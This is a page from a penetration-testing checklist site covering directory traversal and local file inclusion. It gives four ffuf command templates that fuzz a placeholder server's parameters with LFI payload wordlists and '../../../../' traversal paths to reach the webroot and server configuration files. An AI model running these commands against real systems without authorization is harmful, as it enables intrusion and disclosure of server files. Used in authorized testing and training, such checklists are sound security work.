🩸
Pentesting Checklist
  • 👀General Checklist
    • 👁️Recon & Scanning
      • Nmap Scan
    • 🌡️Services
      • SSH
      • FTP
      • Samba
      • Git
      • SNMP
    • ⚙️Reverse Engineering
      • General
      • Android apks
      • Windows Exe or .net binaries
  • 🐞Web Application Checklist
    • 🧠Web App Attack Techniques
      • Password Smuggling Attack
    • 😍Fuzzing with ffuf
    • 💄Directory Fuzzing
      • Using the tools
      • Wordlists to use
    • 👾Subdomain Fuzzing
      • Normal fuzzing
      • Finding through DNS
    • 🎯LFI/RCE
      • LFI
        • What to do once obtained
      • RCE
      • Misc
  • ☕Linux Checklist
    • Page 2
  • 🪟Windows Checklist
    • 💀Windows Connection Methods
  • 🖇️Tips & Tricks
    • Transferring Files
      • 🐧Linux
      • 📸Windows
    • Pivoting / Lateral Movement Techniques
      • proxychains
      • chisel
      • sshuttle
      • ligolo-ng
    • 🧩Fuzzing
    • 🙃Credential Brute-Forcing
  • 🍒Other useful resources:
    • Page 7
Powered by GitBook
On this page
  1. Web Application Checklist
  2. LFI/RCE

Misc

miscellaneous tricks for Directory Traversal/ LFI

PreviousRCENextPage 2

Last updated 2 years ago

  • Fuzz page parameters: ffuf -w /path/to/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://server_ip:port/index.php?FUZZ=value' -fs xxx

  • Fuzz LFI payloads: ffuf -w /path/to/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://server_ip:port/index.php?path=FUZZ' -fs xxx

  • Fuzz webroot path: ffuf -w /path/to/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://server_ip:port/index.php?path=../../../../FUZZ/index.php' -fs xxx

  • Fuzz server configurations (wordlist: : ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://server_ip:port/index.php?path=../../../../FUZZ' -fs xxx

🐞
🎯
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux)